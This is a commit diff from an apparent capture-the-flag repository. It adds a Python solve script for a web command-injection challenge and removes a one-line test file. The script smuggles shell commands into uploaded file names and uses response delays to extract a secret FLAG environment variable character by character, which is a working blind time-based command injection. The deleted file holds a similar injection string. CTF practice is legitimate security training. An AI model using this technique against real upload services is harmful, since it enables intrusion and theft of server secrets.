Some more CTFs

web-cmdi/05_virusvault/solve.py

@@ -0,0 +1,31 @@
+import string
+import time
+
+import requests
+
+files = {"specimen": ("name.txt; sleep 5", "\r\n", "application/octet-stream")}
+url = "https://552d42c0-a789-405e-82e6-fc37e974d764.offsec.m0lecon.it/scan"
+
+count = 1
+flag = ""
+banned = "/\\"
+while count < 50:
+    for char in string.printable:
+        if char not in banned:
+            # print(f"Testing {char}")
+            files = {
+                "specimen": (
+                    f"name.txt; test $(echo $FLAG | cut -c {count}) = {char} && sleep 2 ",
+                    "\r\n",
+                    "application/octet-stream",
+                )
+            }
+            start = time.perf_counter()
+            response = requests.post(url, files=files)
+            elapsed = time.perf_counter() - start
+            if elapsed > 2:
+                print(f"Found char: {char}")
+                flag += char
+                count = count + 1
+                print(f"Actual flag: {flag}")
+                break

web-cmdi/05_virusvault/test1.txt

@@ -1 +0,0 @@
-'a'; $(echo "$FLAG");